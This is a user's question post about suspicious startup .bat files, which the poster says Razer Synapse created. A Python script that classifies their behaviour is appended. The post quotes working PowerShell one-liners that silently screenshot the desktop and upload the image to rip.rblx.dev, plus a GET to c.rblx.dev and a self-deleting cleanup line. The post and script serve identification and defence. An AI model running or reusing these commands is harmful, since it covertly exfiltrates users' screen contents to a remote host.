I had these 4 .bat files created on start run with weird PowerShell code that sends info to a remote server.
After downloading and installing a fresh copy of Windows, I found out it's Razer Synapse that creates those files.
It does look really suspicious.
Here is a topic that has all the info:
https://security.stackexchange.com/questions/207769/installed-a-fresh-copy-of-win10-and-i-have-powershell-script-sending-info-to-htt#comment418996_207769
After syncing for the first time, it creates 4 bat files with this code:
LVTUSIX.bat:
powershell -windowstyle hidden -Command "[void][reflection.assembly]::loadwithpartialname('system.windows.forms'); [system.windows.forms.sendkeys]::sendwait('{PRTSC}'); Get-Clipboard -Format Image | ForEach-Object -MemberName Save -ArgumentList "$env:APPDATA\\WindowsUpdate.png"; invoke-webrequest -method put -infile "$env:APPDATA\\WindowsUpdate.png" https://rip.rblx.dev/c/"
LVTUSIXd.bat:
powershell -windowstyle hidden -Command "[void][reflection.assembly]::loadwithpartialname('system.windows.forms'); [system.windows.forms.sendkeys]::sendwait('{PRTSC}'); Get-Clipboard -Format Image | ForEach-Object -MemberName Save -ArgumentList "$env:APPDATA\\WindowsUpdate.png"; invoke-webrequest -method put -infile "$env:APPDATA\\WindowsUpdate.png" https://rip.rblx.dev/c/"
LVTUSIXdd.bat:
powershell -windowstyle hidden -Command "& {&invoke-webrequest -method get https://c.rblx.dev/c/}
LVTUSIXddx.bat:
del *.bat
What are those PowerShell commands to this rblx.dev?
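A triage sketch added here, not part of the original post and not Razer's code: it reads the .bat contents quoted above and labels what each command line does (hidden window, PrintScreen keystroke, clipboard image, HTTP PUT upload, GET request, self-deletion). The function names, indicator names and regexes are assumptions chosen for this example; the sample strings are copied from the post.

```python
import re
from pathlib import Path

# Indicator name -> regex, each tied to a token visible in the posted .bat files.
INDICATORS = [
    ("hidden_window", r"-windowstyle\s+hidden"),
    ("printscreen_key", r"sendwait\('\{PRTSC\}'\)"),
    ("clipboard_image", r"get-clipboard\s+-format\s+image"),
    ("http_put_upload", r"invoke-webrequest\b.*-method\s+put\b.*-infile"),
    ("http_get_request", r"invoke-webrequest\b.*-method\s+get\b"),
    ("batch_self_delete", r"^\s*del\s+\*\.bat\s*$"),
]
URL_RE = re.compile(r"https?://[^\s\"'}]+", re.I)

def triage(text):
    """Return (matched indicator names, URLs) for one batch file's content."""
    hits = [n for n, pat in INDICATORS if re.search(pat, text, re.I | re.M)]
    return hits, URL_RE.findall(text)

def classify(hits):
    """Summarise the behaviour implied by a set of indicators."""
    if {"printscreen_key", "clipboard_image", "http_put_upload"} <= set(hits):
        return "screenshot captured and uploaded"
    if "http_put_upload" in hits:
        return "file uploaded"
    if "http_get_request" in hits:
        return "outbound web request"
    if "batch_self_delete" in hits:
        return "deletes batch files in its directory"
    return "no indicator matched"

def scan_folder(folder):
    """Triage every .bat file in a folder, e.g. a copy of a Startup folder."""
    return {p.name: triage(p.read_text(errors="replace"))
            for p in sorted(Path(folder).glob("*.bat"))}

# Sample input: file contents copied from the post above.
CAPTURE = r'''powershell -windowstyle hidden -Command "[void][reflection.assembly]::loadwithpartialname('system.windows.forms'); [system.windows.forms.sendkeys]::sendwait('{PRTSC}'); Get-Clipboard -Format Image | ForEach-Object -MemberName Save -ArgumentList "$env:APPDATA\\WindowsUpdate.png"; invoke-webrequest -method put -infile "$env:APPDATA\\WindowsUpdate.png" https://rip.rblx.dev/c/"'''
SAMPLES = {
    "LVTUSIX.bat": CAPTURE,
    "LVTUSIXd.bat": CAPTURE,
    "LVTUSIXdd.bat": r'''powershell -windowstyle hidden -Command "& {&invoke-webrequest -method get https://c.rblx.dev/c/}''',
    "LVTUSIXddx.bat": "del *.bat",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        hits, urls = triage(text)
        print(f"{name}: {classify(hits)} | {', '.join(hits)} | {urls}")
```

`scan_folder` only reads files; point it at a copy of the folder where the .bat files were found to get the same labels for each file on disk.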